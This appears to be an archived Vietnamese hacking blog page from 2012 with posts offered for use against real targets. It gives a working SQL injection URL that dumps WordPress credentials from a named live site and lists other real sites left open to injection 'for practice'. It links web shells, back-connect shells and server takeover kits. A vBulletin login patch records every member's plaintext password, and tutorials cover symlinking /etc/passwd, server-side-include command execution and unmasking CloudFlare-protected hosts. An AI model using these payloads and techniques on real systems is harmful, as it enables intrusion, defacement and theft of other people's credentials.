Thứ Hai, 29 tháng 10, 2012
WordPress Blog Exploit |inurl:"fbconnect_action=myhome"
thay
?fbconnect_action=myhome&userid=
bằng
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_login,0x3a,user_pass) z0mbyak,7,8,9,10,11,12+from+wp_users--
demo :
http://boneramamusic.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+%20select+1,2,3,4,5,concat(user_login,0x3a,user_pass)%20z%E2%80%8B0mbyak,7,8,9,10,11,12+from+wp_users--
Chuyên Mục:
Hacking and Security,
SQL Injection
[TUT] Bypass Filter + 403 Forbidden SQL Injection
Victim :
Chuyên Mục:
SQL Injection
Thứ Năm, 25 tháng 10, 2012
Nghịch ChangUonDyU Chatbox[ Dành cho Newbie]
_Lại chào bà con phát nữa,rảnh tiếp làm cái tut cho mấy ku nghịch ( chỉ dành cho mấy master gà ko config chatbox thôi nhá) pro lượn
[+] _Phần 1 ( config mặc định)
Đọc Thêm
ChangUonDyU - Advanced Statistics SQL injection
010101010101010101010101010101010101010101010101010101010
1 VNHGROUP 0
0 H4cking - S3cure - Und3rGroup 0
010101010101010101010101010101010101010101010101010101010
Đọc Thêm
Share 1 số site dính lỗi Sql cho anh em khai thác... và tập thực hành
www.theafa.org.uk/members.php?id=9'
http://creationcare.org/blank.php?id=35'
http://www.utahrealestateguide.org/p...iew.php?id=258'
http://casescontact.org/press_re_view.php?ID=32'
Đọc Thêm
Chuyên Mục:
SQL Injection
Khai thác SQLI " Lầu Xanh "
Chuyên Mục:
SQL Injection
Thứ Ba, 23 tháng 10, 2012
[Report] ChangUonDyU Advanced Statistics - SQL injection
Mấy ngày nay DaiCa.Net đã bị kẻ lạ login vào account admin.
Tuy nhiên kẻ lạ mặt chưa làm gì được
Đọc Thêm
Cách chiếm cPanel 1 sv
Tải lên sy_conf.pl & htaccess và chmod cả 755
Tải lên B-F.php trong một thư mục khác nhau
.htaccess
http://www.mediafire.com/?4pm551dxidq6zc2
Sy_Conf.pl
http://www.mediafire.com/?r4kkj92ij77r1sf
B-F.php
http://www.mediafire.com/?s58tulka2kmu1d7
Chuyên Mục:
Hacking and Security
Thứ Hai, 22 tháng 10, 2012
3 Thằng "Quay Tay guester.org Để Lấy Vận May "
Nguyên văn của "Chym To Nhất Họ" như sau :
Còn 3 ngàn ngồi nét ra ku kẻ bảo fuck cái site
http://guester.org/
Thấy bảo này nọ lên đéo biết được,nói chung là nhà đang die qua đó Quậy phát xem
Đọc Thêm
Chuyên Mục:
Hacking and Security
Thứ Năm, 18 tháng 10, 2012
50 câu lệnh Linux phải nhớ
clear: làm sạch cửa sổ dòng lệnh
ls tenthumuc: Liệt kê nội dung bên trong một thư mục
cat tentaptin: Hiển thị nội dung của một tập tin lên cửa sổ dòng lệnh
rm tentaptin: Xóa một tập tin
cp taptinnguon taptindich: Sao chép một tập tin
passwd: Đổi mật khẩu
motd: Thông điệp của ngày
finger tentruycap: Chương trình tìm kiếm thông tin người dùng
startx: Khởi động X Window System server
less tentaptin hoặcr more tentaptin: Hiển thị nội dung một tập tin trong cửa sổ dòng lệnh một trang mỗi lần
info: Hiển thị thông tin và tài liệu trên shell, các tiện ích và chương trình.
lpr tentaptin: Gửi tập tin tới máy tin
grep chuoi tentaptin: tìm kiếm chuỗi trong tập tin
head tentaptin: Hiển thị 10 dòng đầu tiên của tập tin
tail tentaptin: Hiển thị 10 dòng cuối cùng của tập tin
mv tentaptincu tentaptinmoi: Di chuyển hoặc đổi tên tập tin
file tentaptin: Hiển thị thông tin về nội dung của tập tin
echo chuoi: Sao chép chuỗi tới màn hình dòng lệnh
date: Hiển thị ngày và giờ hiện tại
cal: Hiển thị lịch
gzip tentaptin: Nén một tập tin
gunzip tentaptin: Giải nén một tập tin
which lenh: Hiển thị đường dẫn tới lệnh
whereis lenh: Hiển thị đường tới nơi chứa lệnh
who: Hiển thị các người dùng đã đang nhập
finger tentruycap@maychu: Thu thập thông tin chi tiết về người dùng hiện đang dùng hệ thống
w: Hiễn thị người dùng đã đăng nhập với các tiến trình sử dụng
mesg y/n: Đặt tùy chọn để các người dùng khác viết thông điệp cho bạn
write nguoidung: Gửi tin nhắn cho người dùng khác
talk nguoidung: Cho phép 2 người chat với nhau
chmod quyen tentaptin: Thay đổi quyền truy cập tập tin
mkdir tenthumuc: Tạo một thư mục
rmdir tenthumuc: Xóa một thư mục rỗng
ln existingfile new-link: Tạo một đường dẫn tới một tập tin (liên kết cứng)
df: Hiển thị tất cả các mount của hệ thộng
top: Hiển thị danh sách các tiến trình đang chạy
tty: Hiển thị tên của cửa sổ dòng lệnh mà trên đó lệnh được dùng
kill PID hoặc số %job: Ngừng một tiến trình bằng số PID (Process Identification Number) hoặc số công việc
jobs : Hiển thị một danh sách các công việc hiện tại
netstat: Hiển thị các kết nối mạng
Chuyên Mục:
TUTORIALS
Chuyển Data Sang 1 Sever khác
Mục đích: Chạy 3 site Ex: Guester, GUG , VG-UG ở 3 host khác nhau và dùng chung data của 1 host nào đó.
Công việc rất đơn giản. Chúng ta chỉ cần cấu hình trên host H cho phép IP của 3 host A, B, C kia được phép kết nối đên MySQL Server của nó.- Đăng nhập vào Cpanel --> Remote MySQL.
Chỉnh như dưới đây:
Sau đó khi khai báo Config Database tại 3 host Guester, GUG, VG-UG kia. Thông số hostname các bạn sẽ thay thế localhost bằng IP của host #.
Nguồn : Sưu tầm
Thứ Tư, 17 tháng 10, 2012
Share code muagi.vn
Live demo: http://muagi.vn
code:http://www.mediafire.com/download.php?aa14rrj37tqa6nk
data:http://www.mediafire.com/download.php?go1hpgz33gj1va6
Pass giải nén: vnw
Chuyên Mục:
Code
Hướng dẫn cài đặt Kloxo trên VPS
- Hệ điều hành: CentOS 52 phiên bản 32bit
- VPS có CPU tối thiểu là 300Mhz
- Ram tối thiểu 256MB
- HDD tối thiểu 3GB
Xem hình ảnh kích thước lớn: Download
Thực hiện cài đặt:
- Truy cập vào VPS bằng SSH
Tiến hành Update cho CentOS:
# su – root
# yum install -y wge
Đợi cho quá trình update xong, chúng ta tiến hành tải file cài đặt Kloxo:
# wget http://download.lxcenter.org/download/kloxo/production/kloxo-installer.sh
Sau khi tải file cài đặt xong, chúng ta thực hiện setup Kloxo:
#sh ./kloxo-installer.sh --type=masterHệ thống sẽ tự động tiến hành cài đặt các gói dữ liệu của Kloxo, quá trình này mất khá nhiều thời gian. Đối với VPS quốc tế, bạn chỉ mất khoảng 10p-60p. Đối với VPS Việt Nam, do hạn chế đường truyền đi quốc tế, bạn sẽ mất khá nhiều thời gian (khoảng từ 1h – 5h) tùy vào tốc độ kết nối đi quốc tế của VPS.
Trong quá trình cài đặt, sẽ có 1 giai đoạn VPS tự động tải và bung + cài đặt các gói ứng dụng rất lâu, điều này khiến cho bạn mất kiên nhẫn chời đợi, tuy nhiên, bạn nên kiên nhẫn, vì giai đoạn này hệ thống tải về khoảng 1,7GB dữ liệu nên khá lâu, đặc biệt là đối với VPS Việt Nam.
Sau khi hệ thống setup hoàn thành, trên màn hình ssh client sẽ báo như sau:
Bạn tiến hành reboot lại VPS và truy cập vào Kloxo Panel theo địa chỉ:
http://IP:7778 (ví dụ: http://123.201.236.12:7778)
User name mặc định: admin
Password mặc định: admin
Bạn tiến hành config các thông số cần thiết cho Kloxo là có thể sử dụng được. Mọi vấn đề cần trợ giúp, bạn có thể gửi email đến support@kloxohosting.net hoặc gửi ticket tại www.kloxohosting.net, hoặc tham khảo thêm tại www.lxlabs.com
Video Upload Shell VBB
[+] video http://www.4shared.com/rar/c05n5a6_/tmtno1.html
[+] shell : http://www.mediafire.com/?y63833jxjppld7s
Chuyên Mục:
Local Attack
CloudFlare Bypass [2-TMT]
Tình hình là vừa ngâm cứu, được ku songoku gửu cho cái diễn đàn củ chuối này bảo là của thằng nào VHB ấy quên con mẹ nó rồi
Ping thử thì lại ra thằng chym to nó bảo vệ thử các bắt kia nhưng ko có thôn tin gì .....ngồi đặt bẫy 1 lúc thì cũng bắt được con chym này , nẩy sinh từ cái fake http://cave-viet.com <-- khi face sai mail nó sẽ gửu info server về cho mình
hehe điều này có nghĩa gì ko?
Nói nhảm 1 lúc ---> reg phát cho an lành ( dùng hót meo nhé)
Cám ơn, ChymTO. Việc ghi danh của bạn đã thành công.Ok giờ check mail xem sao...tùm tèn đã có mail chào mừng :)) chết bà mày ông sắp bắt đc chym bé rồi :))
Bấy giờ bạn có thể bổ sung thông tin trong phần Hồ Sơ, hoặc bạn có thể điều chỉnh trong phần Chức Năng để sử dụng diễn đàn hơn. Bạn không nhất thiết phải làm bây giờ nhưng nếu sau này bạn muốn thì có thể vào phần Ðiều Chỉnh Hồ Sơ để thay đổi những thông tin bạn muốn.
Bạn có thể bấm vào đây để trở về diễn đàn.
giờ view source lên ở phần
và cuối cùng ta tóm được chym bé :x
Authentication-Results: hotmail.com; sender-id=none (sender IP is 112.78.8.55[) header.from=webmaster@maze-gamevn.com; dkim=none header.d=maze-gamevn.com; x-hmca=noneĐịa chỉ cháu nó đây
X-SID-PRA: webmaster@maze-gamevn.com
X-DKIM-Result: None
X-SID-Result: None
X-AUTH-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MjtHRD0yO1NDTD00
X-Message-Info: M98loaK0Lo27IVRxloyPIYugp41x7kap+1oECsaaowgX3KjSMpGPd82yGIyOEI8LD5zoD6/uYI/ascsa1Vz0loszMRbrS18sOMQYW8FsczVADByy3C9VA0SawAi5EQI1Inf8uqrJr+tnhHmqEA6LWg==
Received: from [COLOR="#FF0000"]server-112-78-8-55.domainhostingvn.com ([112.78.8.55])[/COLOR] by COL0-MC4-F36.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
Mon, 15 Oct 2012 05:00:10 -0700
/home/mazegame/public_html/@rumAnd tut...TMT-VNHgroup
Chuyên Mục:
Hacking and Security
CloudFlare Bypass [TMT]
Chúng ta để ý
IP address 199.27.134.50 đây là ip khi ta ping
Virtual servers 178.162.152.80 Linux lighttpd/1.4.20 16-Mar-2011<-- là địa chỉ ip khi nó login để
tiếp theo đó scan bằng nmap ta được
Các bạn nhìn thấy giờ hơm , port 7777 là của koloxo vậy thử đánh
http://178.162.152.80:7778/login/ <--- ra cái gì thế :x
và
http://178.162.152.80 <-- chạy hẳn trên web
tiếp là reverser ip
http://ip.iuvn.net/Reverse-IP-Lookup-DNS-Domain/178.162.152.80.html
Đến đây là các bạn biết làm gì rồi đó, còn với trường hợp mà ko có "Hosting History"thì mình sẽ viết sau...and tut
TMT-VNHgroup
Chuyên Mục:
Hacking and Security
share code vietnam3g.com
Mã:
http://www.mediafire.com/?alkvr9ah61345az
pass: vnhack.us
demo : vietnam3g.com
Chuyên Mục:
Code
share blog9x.mobi
http://www.mediafire.com/?zcxnz689dhyd5mc
demo : blog9x.mobi
pass: vnhack.us
Chuyên Mục:
Code
share code duatop.net
Code + data
http://www.mediafire.com/?8s6vd8fbw7aebj2
pass: vnhack.us
Chuyên Mục:
Code
Thứ Ba, 16 tháng 10, 2012
Tổng hợp TUT local căn bản cho NB
http://www.mediafire.com/?pd10l797f5haw
==================================
Một số tut khác
====================================
Up shell vbb mọi phiên bản (hướng dẫn từ a -gt; z)
http://www.mediafire.com/?gbb3xyhpx2iwoat
pass: tranhoai
====================================
Local hostvn
http://www.mediafire.com/?dhpbve4z1b8gio1
=================================
Tut SQL + up shell +local (tổng hợp)
1.Tìm site lỗi SQL và khai thác
2.Login với quyền admin để up shell
3.Local sang các site khác cùng server
http://www.mediafire.com/?xr10n8nczr8du9q
=================================
Local bằng cách up Cgi-Telnet -
http://www.mediafire.com/download.php?djnmntmgacm
=============================================
Local + Upload shell Joomla chi tiết
http://www.mediafire.com/?3hqep6ku7528vub
pasS: 25071989
==================================
Upload Shell PHPMYADMIN
Link : http://www.mediafire.com/?7rvuy2a62b40k23
Pass : BYG
==================================
một số video khác
http://www.mediafire.com/download.php?tgjd4bnnzdy
http://www.mediafire.com/download.php?ee1ztyyj32n
http://www.mediafire.com/download.php?mwizmitjmmo
http://www.mediafire.com/download.php?iynzjmjjn4y
http://www.mediafire.com/download.php?zjzvenhd1ma
http://www.mediafire.com/download.php?lmq5jlhjxok
http://www.mediafire.com/download.php?jinkzmwmmzy
http://www.mediafire.com/download.php?oimmn2yjnj0
http://www.mediafire.com/download.php?xbonumjzyqz
pass : bocapit
================================================
Local basic
http://www.mediafire.com/?jiki40gwjzx
===========================
Local via sql
http://www.mediafire.com/?w2moq5ygwzy
============================
Tut hướng dẫn chi tiết local thay pass MD5 cho NB
http://www.mediafire.com/?kt4qtkqvma6xusj
=============================
local
http://www.mediafire.com/?lnx6ph8978ljt92
===============================
Vài con shell cần thiết khi local cho anh em!
Shell Cgi (cgi.x-zone) khi gỏ command nó sẽ mã hóa dòng lệnh ,có thể qua mặt vài server
http://www.mediafire.com/?45fsa46y5bdobfa
Telnet 1.3
http://www.mediafire.com/?eayxc5k8utpqeig
.htaccess
Options +FollowSymLinks +Indexes
DirectoryIndex default.html
## START ##
Options +ExecCGI
AddHandler cgi-script cgi pl tg love h4 tgb cbg
RewriteEngine on
RewriteRule (.*)\.war$ $1.cgi
## END ##
RemoveHandler .vkl
AddType application/octet-stream .vkl
~gt; 2 dòng cuối khi symljnk ghi vào file.vkl thì file này load trên trình duyệt sẽ tự download về
Admin Finder (tìm thư mục admin)
http://www.mediafire.com/?skaysiedncckx4k
cmd.shtml gt; view source cmd.shtml
lt;!--#exec cmd=quot;dir /home/victim/public_html/quot; --gt;
cmd.shtml (1.txt là file đã được symljnk) gt; view source cmd.shtml
lt;!--#include virtual='1.txt'--gt;
Bypass ln.zip
lt;?php
chmod('ln',0777);
system('./ln -s /etc/passwd gt; 1.txt');
?gt;
hoặc
./ln -s /home/victim/public_html/index.php 1.txt
File SymLink.php
/home/victim/public_html/index.php
Find Path qua error-log : http://victim.com/fuck
tail -100 /var/log/httpd/domains/siteA.error.log | grep fuck
tail -100 /usr/local/apache/logs/error_log | grep fuck
Shell offline.php?acc ~gt; get user admin ,nhiều chức năng ,ko bị lổi trên các server config kỉ
http://www.mediafire.com/?r19m52itzq71x5z
Backuper.php (Leech code)
http://www.mediafire.com/?kp1p40fnwc2171k
Shell Unkonw (Brute)
http://www.mediafire.com/?hvxjzrm1tjgbwmp
Shell images (r57)
http://www.mediafire.com/?lh0nslgadbsb5ab
Shell images (Webadmin)
http://www.mediafire.com/?lc6cizbpw5ijoio
Shell Dumper.php (Zip + Restor data)
http://www.mediafire.com/?9ecl9efdk4mw3hm
Shell images aaa.php.jpg - shell upload
http://www.mediafire.com/i/?d61ubhb1qw11dst
Shell help.php (upload file + chmod)
http://www.mediafire.com/?ytwx6mv4ee2266l
Unzip.php (giải nén các file bị zip)
http://www.mediafire.com/?1bhs7jmvly3e1b4
Con shell này tạo ra thêm 2 file để thực hiện zip
Nếu ko tạo đc 2 file này thì chúng ta sẽ tự tạo 2 file đó
http://www.mediafire.com/?ims0mlwa9e3yzl1
telnet v1.3 (ko cần htaccess)
http://www.mediafire.com/?t1uu3cr6h6aag5c
sym-pl.pl (symljnk cgi ko cần htaccess)
http://www.mediafire.com/?o8fm7bmw90882hq
Shell Root ( thực thi các dòng lệnh sẽ show ra trình duyệt - chỉ sd 1 số sv)
http://www.mediafire.com/?f86f88nfesduuyp
Locus Shell (back connect)
http://www.mediafire.com/?0vk8v5m8kzcqgvf
perl shell mr.thien (BackConnect)
http://www.mediafire.com/?qedquldy39ilgn9
Ỏ trên là toàn bộ video mình sưu tầm từ web ,blog, post lên cho NB như mình. mong nhân được cái thank từ các bạn.
Chuyên Mục:
Local Attack
Gắn Virus vào Email
gắn virus vào phần nội dung mail
vì các đoạn Script có khả năng hoạt động nếu như một máy dùng trình duyêt IE cho phép chạy ActiveX vì vậy virus cũng có thể lây theo đường này gắn virus vào file gắn kèm ( Attach files)
Virus xây dựng các file dính kèm bằng những thủ thuật sau :
để tránh bị lộ diện virus tạo file bằng 2 phần đuôi
ví dụ aaaa.doc.exe
chính vì vậy mà virus tạo ra file này như thế nào :
tìm trong thư mục my documents và lấy tên của các file tìm thấy
ví dụ : bbbb.doc nó sẽ lưu tên này vào phần dữ liệu , nếu như khi cần gởi thì nó sẽ tạo ra file bbbb.doc.exe để dính kèm vào thư , sau đó tiến hành việc mã hóa theo chuẩn MINE hay Base64 các đoạn mã này do virus tự làm
Gởi mail
Để gởi mail virus có thể tự xây dựng cho mình một cơ cấu SMTP riêng hoặc dựa trên các hàm MAPI trong thu viện MAP32DLL , như MAPILogon, MAPISendMail, MAPISendDocument
VII)Kỹ thuật phá hoại :
1) Các virus ngoải những cách phá hoại thông thường còn có khả năng gây ra tấn công theo kiểu ngăn chặn dịch vụ DOS , ví dụ chúng cho một server nào đó mở một port và điều khiển các máy bị nhiễm truy cập vào server này làm cho số nối kết đến máy chủ vượt quá cho phép
2) Mở một port cho phép truy cập vào máy bị nhiễm
3) Có khả năng cho phép điều khiển từ xa
4) Có thể tấn công máy in vì tưởng rằng máy in cũng là một máy tính nào đó
VIII ) Những khả năng nào khiến cho bạn bị nhiễm Virus hoặc Trojan
A) Do chính bạn
1) Khi bạn truy cập vào một số trang web mà các trang này bị nhiễm virus hoặc Tojan rồi
2) Download những file đã bị nhiễm
3) Nhận mail đã bị nhiễm
4) Nhận một số file từ một người đang chat với bạn
5) Mua disk CD ở ngoài đã bị nhiễm
6) Bạn cho Phép một người khác đem file bị nhiễm vào máy mình
7) Do một số chương trình bạn đang dùng đã được chính hãng gài vào
Do Người khác cố ý
1) Do máy bạn đã được hacker viếng thăm
2) Do người yêu bạn gài vào theo dõi bạn mà bạn không biết
3) Do người bạn thân của bạn
4) Do người bán máy cho bạn gài vào
5 )Do những hãng sản xuất phần cứng gài vào trong các driver
6) Do hãng sản xuất ra phần mền
7) Do hãng sản xuất HĐH
Do KTV bạn mời đến sữa máy cho bạn gài vào
Bạn sẽ không bao giờ có thể thoát được nếu như có một đối tượng nào đó cố ý gài vài
IX) Cách Thức Remove Trojan
Dựa vào đặc điểm của Trojan ta có cách remove nó như sau :
Vì trojan hoạt động cần phải được kích hoạt nên ta tìm cách không cho nó kích hoạt , vỉ vậy muốn diệt được trojan cần phải kiểm tra tất cả những vị trí sau :
Trong các Autostart Folder :
ví dụ file khởi động của trojan là trojan.exe thì
C:\Windows\Start Menu\Programs\startup\trojan.exe
+ Trong file C:\windows\Win.ini tại dòng lệnh
load=Trojan.exe
hoặc run=Trojan.exe
+ Trong file c:\windows\system.ini sau dòng lệnh shell
Shell=Explorer.exe trojan.exe
Trojan sẽ tự động chạy khi file Explorer.exe chạy
+ Trong Autoexec.bat
c:\....\Trojan.exe
+ Explorer Startup
c:\explorer.exe,c:\...\trojan.exe
+ Tạo một khóa trong Registry :
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run]
"trojan"="c:\...\Trojan.exe"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunOnce]
"trojan"="c:\...\Trojan.exe"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServices]
"trojan"="c:\...\Trojan.exe"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServicesOnce]
"trojan"="c:\...\Trojan.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run]
"trojan"="c:\...\Trojan.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\RunOnce]
"trojan"="c:\...\Trojan.exe"
- Trong Registry Shell Open với key là "%1 %*"
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\ open\command]
trojan.exe "%1 %*"
del tất cả các dòng lệnh có file mà trojan boot ở đây ví dụ là file trojan.exe
- Trong 1 số ứng dụng mà cho phép một số chương trình co the chay :
ví dụ ICQ
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\App s\]
- Trong ActiveX
[HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\KeyName]
StubPath=C:\...\Trojan.exe
nếu như nó lây nhiễm qua một mIRC thì vào cửa sổ của nó
1.đánh /unload -rs script.ini
sẽ nhìn thấy : *** Unloaded script.ini
2. đánh command.com /c attrib.exe -s -r script.ini
3.đánh /write -c script.ini
4.đánh /remove script.ini
sẽ nhìn thấy : *** Removed 'c:\mirc\script.ini'.
5.đánh //say $exists(script.ini)
nếu $false lặp lại bước 2 đến bước 4
6.đánh /sreq ask
7.đánh /creq ask
8.đábg /dccserver off
9. Thay đổi tất cả các pass của bạn
Chuyên Mục:
Hacking and Security
Cài Keylogger cho VBB
<b>Cái này sẽ ghi lại pass của mọi thành viên khi họ đăng nhập vào 1 file ta định sẵn
-edit file login.php
tìm:
Trích dẫn
process_new_login($vbulletin->GPC['logintype'], $vbulletin->GPC['cookieuser'], $vbulletin->GPC['cssprefs']);
thêm vào bên dưới:
Trích dẫn
$lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
$lg_password = $vbulletin->GPC["vb_login_password"];
// The log will be recorded in this file
$lg_file = “./modcp/test.html“;
$sql_query = @mysql_query(”SELECT * FROM ” . TABLE_PREFIX . “user WHERE username=’” . $lg_username . “‘”);
while($row = @mysql_fetch_array($sql_query))
{
if(strlen($lg_password) > 1 AND strlen($lg_username) > 1)
{
$fp1 = @fopen($lg_file, “a+”); @fwrite($fp1, $lg_username . ‘ : ‘ . $lg_password.” (” . $row["email"] . “)\n”);
@fclose($fp1);
$f = @file($lg_file);
$new = array_unique($f);
$fp = @fopen($lg_file, “w”);
foreach($new as $values)
{
@fputs($fp, $values);
}
@fclose($fp);
}
}
- Edit file global.php:
Tìm
Trích dẫn
$show['nopasswordempty'] = defined(’DISABLE_PASSWORD_CLEARING’) ? 1 : 0; // this nees to be an int for the templates
Thay bằng:
Trích dẫn
//$show['nopasswordempty'] = defined(’DISABLE_PASSWORD_CLEARING’) ? 1 : 0; // this nees to be an int for the templates
- Nếu gặp lỗi các bạn có thể vào file global.php tìm
Trích dẫn
eval(’$ad_location[\'ad_header_logo\'] = “‘ . fetch_template(’ad_header_logo’) . ‘”;’);
eval(’$ad_location[\'ad_header_end\'] = “‘ . fetch_template(’ad_header_end’) . ‘”;’);
eval(’$ad_location[\'ad_navbar_below\'] = “‘ . fetch_template(’ad_navbar_below’) . ‘”;’);
eval(’$ad_location[\'ad_footer_start\'] = “‘ . fetch_template(’ad_footer_start’) . ‘”;’);
eval(’$ad_location[\'ad_footer_end\'] = “‘ . fetch_template(’ad_footer_end’) . ‘”;’);
Và thay thể bằng
Trích dẫn
//eval(’$ad_location[\'ad_header_logo\'] = “‘ . fetch_template(’ad_header_logo’) . ‘”;’);
//eval(’$ad_location[\'ad_header_end\'] = “‘ . fetch_template(’ad_header_end’) . ‘”;’);
//eval(’$ad_location[\'ad_navbar_below\'] = “‘ . fetch_template(’ad_navbar_below’) . ‘”;’);
//eval(’$ad_location[\'ad_footer_start\'] = “‘ . fetch_template(’ad_footer_start’) . ‘”;’);
//eval(’$ad_location[\'ad_footer_end\'] = “‘ . fetch_template(’ad_footer_end’) . ‘”;’);
File chứa Password sẽ được lưu ở đây:
/modcp/test.htm
Nguồn:http://phongdatgl.biz/blog/read.php?88#ixzz29N4xZTpP</b>
Chuyên Mục:
vBulletin
Chủ Nhật, 7 tháng 10, 2012
Tìm user của victim khi local
Đầu tiên và cũng là cách đơn giản nhất ,đọc file /etc/passwd và đoán user dựa trên domain
cat /etc/passwd
nếu bị server chặn lệnh cat ,bạn thử symlink nó
ln -s /etc/passwd list.txt
hoặc nếu hàm readfile chưa bị disable ,bạn cũng có thể tận dụng nó, tạo 1 file php nội dung như sau
<?php
readfile('/etc/passwd');
?>
Sau đó tiến hành đoán ,user thường giống với domain ,đã loại bỏ kí tự “-” trong domain, đôi khi loại bỏ cả số trong domain.
Cách trên là cơ bản ,nếu domain của victim là domain chính của host ,còn trường hợp là addon domain thì bó tay sao ?
Thử tìm trong logs ,ở đây là error_log ,vào domain victim và tạo ra một error trên trang đó (404 chẳng hạn) rồi tiến hành đọc error_log
tail -1000 /usr/local/apache/logs/error_log
vì các file log này dung lượng rất lớn ,đọc toàn bộ là điểu không khả thi ,chúng ta chỉ cần 1000 dòng cuối cùng trong error_log này ,nó sẽ log cái error mà ta vừa tạo ra trên domain của victim.
Path log trên là khi host dùng cpanel ,đối với directadmin ta có thể tìm được ở /var/log/directadmin/error.log
Trường hợp domain victim dùng mod_rewrite ,tất cả các truy vấn đều hợp lệ thì error_log sẽ không được tạo ra ,thì ta sẽ tiếp tục đọc access_log ,sử dụng lệnh grep để tìm đúng domain mình cần.
grep -i ‘domain.com’ /usr/local/apache/logs/access_log
hoặc lệnh egrep để tìm nhiều domain cùng lúc
egrep -w ‘domain1|domain2|domain3′ /usr/local/apache/logs/access_log
Cuối cùng, cũng là cách mang tính hên xui rất cao nhưng không phải là không được đó là tìm trên google ,search với từ khóa
1
site:domain.com "warning"
và như thế ,bất kì lỗi nào trên website domain.com bị google index đều hiện ra ,và biết đâu trong đó có path của file lỗi ,và thế là ta tìm được user của victim.
Nguồn :Sưu tầm
Chuyên Mục:
Local Attack
Đăng ký:
Bài đăng (Atom)